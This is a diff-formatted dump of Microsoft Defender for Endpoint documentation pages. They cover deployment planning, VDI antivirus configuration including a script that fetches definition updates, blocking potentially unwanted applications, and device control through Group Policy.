-For reporting, Windows events comprise several security event sources, including Security Account Manager (SAM) events ([enhanced for Windows 10](/windows/whats-new/whats-new-windows-10-version-1507-and-1511). Also see [Security auditing](/windows/security/threat-protection/auditing/security-auditing-overview) and [Windows Defender events](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/).
-
-## See also
--- [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md)-- [Deploy and enable Microsoft Defender Antivirus protection](deploy-microsoft-defender-antivirus.md)-- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Monitor and report on Microsoft Defender Antivirus protection](report-monitor-microsoft-defender-antivirus.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)--
-> [!TIP]
-> **Performance tip** Due to a variety of factors, Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues. You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions. See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security Deployment Strategy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-strategy.md
- Title: Identify Defender for Endpoint architecture and deployment method
-description: Select the best Microsoft Defender for Endpoint deployment strategy for your environment.
-----
- - m365-security
- - tier1
-- Previously updated : 04/03/2024--
-# Identify Defender for Endpoint architecture and deployment method
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-secopsdashboard-abovefoldlink)
-
-If you're already completed the steps to set up your Microsoft Defender for Endpoint deployment, and you have assigned roles and permissions for Defender for Endpoint, your next step is to create a plan for onboarding. Your plan begins with identifying your architecture and choosing your deployment method.
-
-We understand that every enterprise environment is unique, so we've provided several options to give you the flexibility in choosing how to deploy the service. Deciding how to onboard endpoints to the Defender for Endpoint service comes down to two important steps:
--
-## Step 1: Identify your architecture
-
-Depending on your environment, some tools are better suited for certain architectures. Use the following table to decide which Defender for Endpoint architecture best suits your organization.
-
-|Architecture |Description |
-|||
-|**Cloud-native**| We recommend using Microsoft Intune to onboard, configure, and remediate endpoints from the cloud for enterprises who don't have an on-premises configuration management solution or are looking to reduce their on-premises infrastructure. |
-|**Co-management**| For organizations who host both on-premises and cloud-based workloads we recommend using Microsoft's ConfigMgr and Intune for their management needs. These tools provide a comprehensive suite of cloud-powered management features, and unique co-management options to provision, deploy, manage, and secure endpoints and applications across an organization. |
-|**On-premises**|For enterprises who want to take advantage of the cloud-based capabilities of Microsoft Defender for Endpoint while also maximizing their investments in Configuration Manager or Active Directory Domain Services, we recommend this architecture.|
-|**Evaluation and local onboarding**|We recommend this architecture for SOCs (Security Operations Centers) who are looking to evaluate or run a Microsoft Defender for Endpoint pilot, but don't have existing management or deployment tools. This architecture can also be used to onboard devices in small environments without management infrastructure, such as a DMZ (Demilitarized Zone).|
-
-## Step 2: Select deployment method
-
-Once you have determined the architecture of your environment and have created an inventory as outlined in the [requirements section](../defender-endpoint/mde-planning-guide.md#requirements), use the table below to select the appropriate deployment tools for the endpoints in your environment. This will help you plan the deployment effectively.
-
-|Endpoint|Deployment tool|
-|||
-|**Windows**|[Local script (up to 10 devices)](configure-endpoints-script.md) <br> [Group Policy](configure-endpoints-gp.md) <br> [Microsoft Intune/ Mobile Device Manager](configure-endpoints-mdm.md) <br> [Microsoft Configuration Manager](configure-endpoints-sccm.md) <br> [VDI scripts](configure-endpoints-vdi.md)|
-|**Windows servers<br>Linux servers** | [Integration with Microsoft Defender for Cloud](azure-server-integration.md)
-|**macOS**|[Local script](mac-install-manually.md) <br> [Microsoft Intune](mac-install-with-intune.md) <br> [JAMF Pro](mac-install-with-jamf.md) <br> [Mobile Device Management](mac-install-with-other-mdm.md)|
-|**Linux servers**|[Local script](linux-install-manually.md) <br> [Puppet](linux-install-with-puppet.md) <br> [Ansible](linux-install-with-ansible.md) <br> [Chef](linux-deploy-defender-for-endpoint-with-chef.md)<br> [Saltstack](linux-install-with-saltack.md)|
-|**Android**|[Microsoft Intune](android-intune.md)|
-|**iOS**|[Microsoft Intune](ios-install.md) <br> [Mobile Application Manager](ios-install-unmanaged.md) |
-
->[!Note]
-> For devices that aren't managed by Microsoft Intune or Microsoft Configuration Manager, you can use the Security Management for Microsoft Defender for Endpoint to receive security configurations for Microsoft Defender directly from Intune.
-
-## Next step
-
-After choosing your Defender for Endpoint architecture and deployment method continue to [Step 4 - Onboard devices](onboarding.md).
security Deployment Vdi Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus.md
- Title: Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop infrastructure environment
-description: Get an overview of how to configure Microsoft Defender Antivirus in a remote desktop or non-persistent virtual desktop environment.
Previously updated : 03/06/2023----------- m365-security-- tier2-- ContentEngagementFY23-- mde-ngp--
-# Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop infrastructure environment
-
-**Applies to:**
--- Microsoft Defender Antivirus-- [Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-**Platforms**
--- Windows-
-> [!TIP]
-> This article is designed for customers who are using Microsoft Defender Antivirus capabilities only. If you have Microsoft Defender for Endpoint (which includes Microsoft Defender Antivirus alongside additional device protection capabilities), skip this article and proceed to [Onboard non-persistent virtual desktop infrastructure (VDI) devices in Microsoft Defender XDR](configure-endpoints-vdi.md).
-
-You can use Microsoft Defender Antivirus in a remote desktop (RDS) or non-persistent virtual desktop infrastructure (VDI) environment. Following the guidance in this article, you can configure updates to download directly to your RDS or VDI environments when a user signs in.
-
-This guide describes how to configure Microsoft Defender Antivirus on your VMs for optimal protection and performance, including how to:
--- [Set up a dedicated VDI file share for security intelligence updates](#set-up-a-dedicated-vdi-file-share-for-security-intelligence)-- [Randomize scheduled scans](#randomize-scheduled-scans)-- [Use quick scans](#use-quick-scans)-- [Prevent notifications](#prevent-notifications)-- [Disable scans from occurring after every update](#disable-scans-after-an-update)-- [Scan out-of-date machines or machines that have been offline for a while](#scan-vms-that-have-been-offline)-- [Apply exclusions](#exclusions)-
-> [!IMPORTANT]
-> Although a VDI can be hosted on Windows Server 2012 or Windows Server 2016, virtual machines (VMs) should be running Windows 10, version 1607 at a minimum, due to increased protection technologies and features that are unavailable in earlier versions of Windows.
-
-## Set up a dedicated VDI file share for security intelligence
-
-In Windows 10, version 1903, Microsoft introduced the shared security intelligence feature, which offloads the unpackaging of downloaded security intelligence updates onto a host machine. This method reduces the usage of CPU, disk, and memory resources on individual machines. Shared security intelligence now works on Windows 10, version 1703 and later. You can set up this capability by using Group Policy or PowerShell, as described in the following table:
-
-|Method | Procedure |
-|||
-| Group Policy | 1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you want to configure, and then select **Edit**.<br/><br/>2. In the Group Policy Management Editor, go to **Computer configuration**.<br/><br/>Select **Administrative templates**.<br/><br/>Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.<br/><br/>3. Double-click **Define security intelligence location for VDI clients**, and then set the option to **Enabled**. A field automatically appears.<br/><br/>4. Enter `\\<sharedlocation\>\wdav-update` (for help with this value, see [Download and unpackage](#download-and-unpackage-the-latest-updates)).<br/><br/>5. Select **OK**.<br/><br/>Deploy the GPO to the VMs you want to test. |
-| PowerShell | 1. On each RDS or VDI device, use the following cmdlet to enable the feature: `Set-MpPreference -SharedSignaturesPath \\<shared location>\wdav-update`. <br/><br/>2. Push the update as you normally would push PowerShell-based configuration policies onto your VMs. (See the [Download and unpackage](#download-and-unpackage-the-latest-updates) section the \<shared location\> entry.) |
-
-## Download and unpackage the latest updates
-
-Now you can get started on downloading and installing new updates. We've created a sample PowerShell script for you below. This script is the easiest way to download new updates and get them ready for your VMs. You should then set the script to run at a certain time on the management machine by using a scheduled task (or, if you're familiar with using PowerShell scripts in Azure, Intune, or SCCM, you could also use those scripts).
-
-```PowerShell
-$vdmpathbase = "$env:systemdrive\wdav-update\{00000000-0000-0000-0000-"
-$vdmpathtime = Get-Date -format "yMMddHHmmss"
-$vdmpath = $vdmpathbase + $vdmpathtime + '}'
-$vdmpackage = $vdmpath + '\mpam-fe.exe'
-
-New-Item -ItemType Directory -Force -Path $vdmpath | Out-Null
-
-Invoke-WebRequest -Uri 'https://go.microsoft.com/fwlink/?LinkID=121721&arch=x64' -OutFile $vdmpackage
-
-Start-Process -FilePath $vdmpackage -WorkingDirectory $vdmpath -ArgumentList "/x"
-```
-
-You can set a scheduled task to run once a day so that whenever the package is downloaded and unpacked then the VMs will receive the new update.
-We suggest starting with once a day, but you should experiment with increasing or decreasing the frequency to understand the impact.
-
-Security intelligence packages are typically published once every three to four hours. Setting a frequency shorter than four hours isn't advisable because it will increase the network overhead on your management machine for no benefit.
-
-You can also set up your single server or machine to fetch the updates on behalf of the VMs at an interval and place them in the file share for consumption.
-This configuration is possible when the devices have the share and read access (NTFS permissions) to the share so they can grab the updates. To set this configuration up, follow these steps:
-
- 1. Create an SMB/CIFS file share.
-
- 2. Use the following example to create a file share with the following share permissions.
-
- ```PowerShell
- PS c:\> Get-SmbShareAccess -Name mdatp$
-
- Name ScopeName AccountName AccessControlType AccessRight
- - -- -- --
- mdatp$ * Everyone Allow Read
- ```
-
- > [!NOTE]
- > An NTFS permission is added for **Authenticated Users:Read:**.
-
- For this example, the file share is:
-
- `\\fileserver.fqdn\mdatp$\wdav-update`
-
-### Set a scheduled task to run the PowerShell script
-
-1. On the management machine, open the Start menu and type **Task Scheduler**. Open it and select **Create task...** on the side panel.
-
-2. Enter the name as **Security intelligence unpacker**. Go to the **Trigger** tab. Select **New...** \> **Daily**, and select **OK**.
-
-3. Go to the **Actions** tab. Select **New...** Enter **PowerShell** in the **Program/Script** field. Enter `-ExecutionPolicy Bypass c:\wdav-update\vdmdlunpack.ps1` in the **Add arguments** field. Select **OK**.
-
-4. Configure any other settings as appropriate.
-
-5. Select **OK** to save the scheduled task.
-
-You can initiate the update manually by right-clicking on the task and then selecting **Run**.
-
-### Download and unpackage manually
-
-If you would prefer to do everything manually, here's what to do to replicate the script's behavior:
-
-1. Create a new folder on the system root called `wdav_update` to store intelligence updates, for example, create the folder `c:\wdav_update`.
-
-2. Create a subfolder under *wdav_update* with a GUID name, such as `{00000000-0000-0000-0000-000000000000}`
-
- Here's an example: `c:\wdav_update\{00000000-0000-0000-0000-000000000000}`
-
- > [!NOTE]
- > In the script we set it so the last 12 digits of the GUID are the year, month, day, and time when the file was downloaded so that a new folder is created each time. You can change this so that the file is downloaded to the same folder each time.
-
-3. Download a security intelligence package from [https://www.microsoft.com/wdsi/definitions](https://www.microsoft.com/wdsi/definitions) into the GUID folder. The file should be named `mpam-fe.exe`.
-
-4. Open a cmd prompt window and navigate to the GUID folder you created. Use the **/X** extraction command to extract the files, for example `mpam-fe.exe /X`.
-
- > [!NOTE]
- > The VMs will pick up the updated package whenever a new GUID folder is created with an extracted update package or whenever an existing folder is updated with a new extracted package.
-
-## Randomize scheduled scans
-
-Scheduled scans run in addition to [real-time protection and scanning](configure-real-time-protection-microsoft-defender-antivirus.md).
-
-The start time of the scan itself is still based on the scheduled scan policy (**ScheduleDay**, **ScheduleTime**, and **ScheduleQuickScanTime**). Randomization will cause Microsoft Defender Antivirus to start a scan on each machine within a four-hour window from the time set for the scheduled scan.
-
-See [Schedule scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) for other configuration options available for scheduled scans.
-
-## Use quick scans
-
-You can specify the type of scan that should be performed during a scheduled scan. Quick scans are the preferred approach as they're designed to look in all places where malware needs to reside to be active. The following procedure describes how to set up quick scans using Group Policy.
-
-1. In your Group Policy Editor, go to **Administrative templates** \> **Windows components** \> **Microsoft Defender Antivirus** \> **Scan**.
-
-2. Select **Specify the scan type to use for a scheduled scan** and then edit the policy setting.
-
-3. Set the policy to **Enabled**, and then under **Options**, select **Quick scan**.
-
-4. Select **OK**.
-
-5. Deploy your Group Policy object as you usually do.
-
-## Prevent notifications
-
-Sometimes, Microsoft Defender Antivirus notifications are sent to or persist across multiple sessions. To help avoid user confusion, you can lock down the Microsoft Defender Antivirus user interface. The following procedure describes how to suppress notifications using Group Policy.
-
-1. In your Group Policy Editor, go to **Windows components** \> **Microsoft Defender Antivirus** \> **Client Interface**.
-
-2. Select **Suppress all notifications** and then edit the policy settings.
-
-3. Set the policy to **Enabled**, and then select **OK**.
-
-4. Deploy your Group Policy object as you usually do.
-
-Suppressing notifications prevents notifications from Microsoft Defender Antivirus from showing up when scans are done or remediation actions are taken. However, your security operations team will see the results of a scan if an attack is detected and stopped. Alerts, such as an initial access alert, are generated and will appear in the [Microsoft Defender portal](https://security.microsoft.com).
-
-## Disable scans after an update
-
-Disabling a scan after an update will prevent a scan from occurring after receiving an update. You can apply this setting when creating the base image if you have also run a quick scan. This way, you can prevent the newly updated VM from performing a scan again (as you've already scanned it when you created the base image).
-
-> [!IMPORTANT]
-> Running scans after an update will help ensure your VMs are protected with the latest security intelligence updates. Disabling this option will reduce the protection level of your VMs and should only be used when first creating or deploying the base image.
-
-1. In your Group Policy Editor, go to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.
-
-2. Select **Turn on scan after security intelligence update** and then edit the policy setting.
-
-3. Set the policy to **Disabled**.
-
-4. Select **OK**.
-
-5. Deploy your Group Policy object as you usually do.
-
-This policy prevents a scan from running immediately after an update.
-
-## Disable the `ScanOnlyIfIdle` option
-
-Use the following cmdlet, to stop a quick or scheduled scan whenever the device goes idle if it is in passive mode.
-
-```PowerShell
-Set-MpPreference -ScanOnlyIfIdleEnabled $false
-```
-
-You can also disable the `ScanOnlyIfIdle` option in Microsoft Defender Antivirus by configuration via local or domain group policy. This setting prevents significant CPU contention in high density environments.
-
-For more information, see [Start the scheduled scan only when computer is on but not in use](https://admx.help/?Category=SystemCenterEndpointProtection&Policy=Microsoft.Policies.Antimalware::scan_scanonlyifidle).
-
-## Scan VMs that have been offline
-
-1. In your Group Policy Editor, go to **Windows components** \> **Microsoft Defender Antivirus** \> **Scan**.
-
-2. Select **Turn on catch-up quick scan** and then edit the policy setting.
-
-3. Set the policy to **Enabled**.
-
-4. Select **OK**.
-
-5. Deploy your Group Policy Object as you usually do.
-
-This policy forces a scan if the VM has missed two or more consecutive scheduled scans.
-
-## Enable headless UI mode
-
-1. In your Group Policy Editor, go to **Windows components** \> **Microsoft Defender Antivirus** \> **Client Interface**.
-
-2. Select **Enable headless UI mode** and edit the policy.
-
-3. Set the policy to **Enabled**.
-
-4. Select **OK**.
-
-5. Deploy your Group Policy Object as you usually do.
-
-This policy hides the entire Microsoft Defender Antivirus user interface from end users in your organization.
-
-## Exclusions
-
-If you think you need to add exclusions, see [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-## See also
--- [Tech Community Blog: Configuring Microsoft Defender Antivirus for non-persistent VDI machines](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/configuring-microsoft-defender-antivirus-for-non-persistent-vdi/ba-p/1489633)-- [TechNet forums on Remote Desktop Services and VDI](https://social.technet.microsoft.com/Forums/windowsserver/home?forum=winserverTS)-- [SignatureDownloadCustomTask PowerShell script](https://www.powershellgallery.com/packages/SignatureDownloadCustomTask/1.4)-
-If you're looking for information about Defender for Endpoint on non-Windows platforms, see the following resources:
--- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Detect Block Potentially Unwanted Apps Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md
- Title: Block potentially unwanted applications with Microsoft Defender Antivirus
-description: Enable the potentially unwanted application (PUA) antivirus feature to block unwanted software such as adware.
----------- m365-security-- tier2-- mde-ngp Previously updated : 08/28/2023--
-# Detect and block potentially unwanted applications
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Edge](/microsoft-edge/deploy/microsoft-edge)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Potentially unwanted applications (PUA) are a category of software that can cause your machine to run slowly, display unexpected ads, or at worst, install other software that might be unexpected or unwanted. PUA isn't considered a virus, malware, or other type of threat, but it might perform actions on endpoints that adversely affect endpoint performance or use. The term *PUA* can also refer to an application that has a poor reputation, as assessed by Microsoft Defender for Endpoint, due to certain kinds of undesirable behavior.
-
-Here are some examples:
--- **Advertising software** that displays advertisements or promotions, including software that inserts advertisements to webpages.-- **Bundling software** that offers to install other software that isn't digitally signed by the same entity. Also, software that offers to install other software that qualifies as PUA.-- **Evasion software** that actively tries to evade detection by security products, including software that behaves differently in the presence of security products.-
-> [!TIP]
-> For more examples and a discussion of the criteria we use to label applications for special attention from security features, see [How Microsoft identifies malware and potentially unwanted applications](/windows/security/threat-protection/intelligence/criteria).
-
-Potentially unwanted applications can increase the risk of your network being infected with actual malware, make malware infections harder to identify, or cost your IT and security teams time and effort to clean them up. PUA protection is supported on Windows 11, Windows 10, Windows Server 2022, Windows Server 2019, and Windows Server 2016. If your organization's subscription includes [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), Microsoft Defender Antivirus blocks apps that are considered to be PUA by default on Windows devices.
-
-[Learn more about Windows Enterprise subscriptions](https://www.microsoft.com/microsoft-365/windows/windows-11-enterprise).
-
-## Microsoft Edge
-
-The [new Microsoft Edge](https://support.microsoft.com/microsoft-edge/get-to-know-microsoft-edge-3f4bb0ff-58de-2188-55c0-f560b7e20bea), which is Chromium-based, blocks potentially unwanted application downloads and associated resource URLs. This feature is provided via [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview).
-
-### Enable PUA protection in Chromium-based Microsoft Edge
-
-Although potentially unwanted application protection in Microsoft Edge (Chromium-based, version 80.0.361.50) is turned off by default, it can easily be turned on from within the browser.
-
-1. In your Microsoft Edge browser, select the ellipses, and then choose **Settings**.
-
-2. Select **Privacy, search, and services**.
-
-3. Under the **Security** section, turn on **Block potentially unwanted apps**.
-
-> [!TIP]
-> If you are running Microsoft Edge (Chromium-based), you can safely explore the URL-blocking feature of PUA protection by testing it out on one of our [Microsoft Defender SmartScreen demo pages](https://demo.smartscreen.msft.net/).
-
-### Block URLs with Microsoft Defender SmartScreen
-
-In Chromium-based Microsoft Edge with PUA protection turned on, Microsoft Defender SmartScreen protects you from PUA-associated URLs.
-
-Security admins can [configure](/DeployEdge/configure-microsoft-edge) how Microsoft Edge and Microsoft Defender SmartScreen work together to protect groups of users from PUA-associated URLs. There are several [group policy settings](/DeployEdge/microsoft-edge-policies#smartscreen-settings) explicitly for Microsoft Defender SmartScreen available, including [one for blocking PUA](/DeployEdge/microsoft-edge-policies#smartscreenpuaenabled). In addition, admins can [configure Microsoft Defender SmartScreen](/microsoft-edge/deploy/available-policies?source=docs#configure-windows-defender-smartscreen) as a whole, using group policy settings to turn Microsoft Defender SmartScreen on or off.
-
-Although Microsoft Defender for Endpoint has its own blocklist based upon a data set managed by Microsoft, you can customize this list based on your own threat intelligence. If you [create and manage indicators](manage-indicators.md) in the Microsoft Defender for Endpoint portal, Microsoft Defender SmartScreen respects the new settings.
-
-## Microsoft Defender Antivirus and PUA protection
-
-The potentially unwanted application (PUA) protection feature in Microsoft Defender Antivirus can detect and block PUA on endpoints in your network.
-
-> [!NOTE]
-> This feature is available in Windows 11, Windows 10, Windows Server 2022, Windows Server 2019, and Windows Server 2016.
-
-Microsoft Defender Antivirus blocks detected PUA files and any attempts to download, move, run, or install them. Blocked PUA files are then moved to quarantine. When a PUA file is detected on an endpoint, Microsoft Defender Antivirus sends a notification to the user ([unless notifications have been disabled](configure-notifications-microsoft-defender-antivirus.md) in the same format as other threat detections. The notification is prefaced with `PUA:` to indicate its content.
-
-The notification appears in the usual [quarantine list within the Windows Security app](microsoft-defender-security-center-antivirus.md).
-
-## Configure PUA protection in Microsoft Defender Antivirus
-
-You can enable PUA protection with [Microsoft Intune](/mem/intune/protect/device-protect), [Microsoft Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection), [Group Policy](/azure/active-directory-domain-services/manage-group-policy), or via [PowerShell cmdlets](/powershell/module/defender/?preserve-view=true&view=win10-ps).
-
-At first, try using PUA protection in audit mode. It detects potentially unwanted applications without actually blocking them. Detections are captured in the Windows Event log. PUA protection in audit mode is useful if your company is conducting an internal software security compliance check and it's important to avoid false positives.
-
-### Use Intune to configure PUA protection
-
-See the following articles:
--- [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure)-- [Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune](/intune/device-restrictions-windows-10#microsoft-defender-antivirus)-
-### Use Configuration Manager to configure PUA protection
-
-PUA protection is enabled by default in the Microsoft Configuration Manager (Current Branch).
-
-See [How to create and deploy antimalware policies: Scheduled scans settings](/configmgr/protect/deploy-use/endpoint-antimalware-policies#real-time-protection-settings) for details on configuring Microsoft Configuration Manager (Current Branch).
-
-For System Center 2012 Configuration Manager, see [How to Deploy Potentially Unwanted Application Protection Policy for Endpoint Protection in Configuration Manager](/previous-versions/system-center/system-center-2012-R2/hh508770(v=technet.10)#BKMK_PUA).
-
-> [!NOTE]
-> PUA events blocked by Microsoft Defender Antivirus are reported in the Windows Event Viewer and not in Microsoft Configuration Manager.
-
-### Use Group Policy to configure PUA protection
-
-1. Download and install [Administrative Templates (.admx) for Windows 11 October 2021 Update (21H2)](https://www.microsoft.com/download/details.aspx?id=103507)
-
-2. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-3. Select the Group Policy Object you want to configure, and then choose **Edit**.
-
-4. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-5. Expand the tree to **Windows Components** \> **Microsoft Defender Antivirus**.
-
-6. Double-click **Configure detection for potentially unwanted applications**.
-
-7. Select **Enabled** to enable PUA protection.
-
-8. In **Options**, select **Block** to block potentially unwanted applications, or select **Audit Mode** to test how the setting works in your environment. Select **OK**.
-
-9. Deploy your Group Policy object as you usually do.
-
-### Use PowerShell cmdlets to configure PUA protection
-
-#### To enable PUA protection
-
-```PowerShell
-Set-MpPreference -PUAProtection Enabled
-```
-
-Setting the value for this cmdlet to `Enabled` turns on the feature if it has been disabled.
-
-#### To set PUA protection to audit mode
-
-```PowerShell
-Set-MpPreference -PUAProtection AuditMode
-```
-
-Setting `AuditMode` detects PUAs without blocking them.
-
-#### To disable PUA protection
-
-We recommend keeping PUA protection turned on. However, you can turn it off by using the following cmdlet:
-
-```PowerShell
-Set-MpPreference -PUAProtection Disabled
-```
-
-Setting the value for this cmdlet to `Disabled` turns off the feature if it has been enabled.
-
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/index).
-
-## View PUA events using PowerShell
-
-PUA events are reported in the Windows Event Viewer, but not in Microsoft Configuration Manager or in Intune. You can also use the `Get-MpThreat` cmdlet to view threats that Microsoft Defender Antivirus handled. Here's an example:
-
-```console
-CategoryID : 27
-DidThreatExecute : False
-IsActive : False
-Resources : {webfile:_q:\Builds\Dalton_Download_Manager_3223905758.exe|http://d18yzm5yb8map8.cloudfront.net/
- fo4yue@kxqdw/Dalton_Download_Manager.exe|pid:14196,ProcessStart:132378130057195714}
-RollupStatus : 33
-SchemaVersion : 1.0.0.0
-SeverityID : 1
-ThreatID : 213927
-ThreatName : PUA:Win32/InstallCore
-TypeID : 0
-PSComputerName :
-```
-
-## Get email notifications about PUA detections
-
-You can turn on email notifications to receive mail about PUA detections.
-
-See [Troubleshoot event IDs](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/) for details on viewing Microsoft Defender Antivirus events. PUA events are recorded under event ID **1160**.
-
-## View PUA events using advanced hunting
-
-If you're using [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), you can use an advanced hunting query to view PUA events. Here's an example query:
-
-```console
-DeviceEvents
-| where ActionType == "AntivirusDetection"
-| extend x = parse_json(AdditionalFields)
-| project Timestamp, DeviceName, FolderPath, FileName, SHA256, ThreatName = tostring(x.ThreatName), WasExecutingWhileDetected = tostring(x.WasExecutingWhileDetected), WasRemediated = tostring(x.WasRemediated)
-| where ThreatName startswith_cs 'PUA:'
-```
-
-To learn more about advanced hunting, see [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-## Exclude files from PUA protection
-
-Sometimes a file is erroneously blocked by PUA protection, or a feature of a PUA is required to complete a task. In these cases, a file can be added to an exclusion list.
-
-For more information, see [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Next-generation protection](microsoft-defender-antivirus-in-windows-10.md)-- [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md)
security Device Control Deploy Manage Gpo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-deploy-manage-gpo.md
- Title: Deploy and manage device control in Microsoft Defender for Endpoint with Group Policy
-description: Learn how to deploy and manage device control in Defender for Endpoint using Group Policy
--- Previously updated : 02/14/2024------ m365-security-- tier2-- mde-asr--- partner-contribution---
-# Deploy and manage device control in Microsoft Defender for Endpoint using Group Policy
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-If you're using Group Policy to manage Defender for Endpoint settings, you can use it to deploy and manage device control.
-
-## Enable or disable removable storage access control
--
-1. On a device running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Features** \> **Device Control**.
-
-2. In the **Device Control** window, select **Enabled**.
-
-> [!NOTE]
-> If you don't see these Group Policy Objects, you need to add the Group Policy Administrative Templates (ADMX). You can download administrative template ([WindowsDefender.adml](https://github.com/microsoft/mdatp-devicecontrol/blob/main/windows/WindowsDefender.adml) and [WindowsDefender.admx](https://github.com/microsoft/mdatp-devicecontrol/blob/main/windows/WindowsDefender.admx)) from [mdatp-devicecontrol / Windows samples](https://github.com/microsoft/mdatp-devicecontrol/tree/main/windows) in GitHub.
-
-## Set default enforcement
-
-You can set default access such as, `Deny` or `Allow` for all device control features, such as `RemovableMediaDevices`, `CdRomDevices`, `WpdDevices`, and `PrinterDevices`.
--
-For example, you can have either a `Deny` or an `Allow` policy for `RemovableMediaDevices`, but not for `CdRomDevices` or `WpdDevices`. If you set `Default Deny` through this policy, then Read/Write/Execute access to `CdRomDevices` or `WpdDevices` is blocked. If you only want to manage storage, make sure to create `Allow` policy for printers. Otherwise, default enforcement (Deny) is applied to printers, too.
-
-1. On a device running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Features** \> **Device Control** \> **Select Device Control Default Enforcement Policy**.
-
-2. In the **Select Device Control Default Enforcement Policy** window, select **Default Deny**.
-
-## Configure device types
--
-To configure the device types that a device control policy is applied, follow these steps:
-
-1. On a computer running Windows, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Device Control** \> **Turn on device control for specific device types**.
-
-2. In the **Turn on device control for specific types** window, specify the product family IDs, separate by a pipe (`|`). Product family IDs include `RemovableMediaDevices`, `CdRomDevices`, `WpdDevices`, or `PrinterDevices`.
-
-## Define groups
--
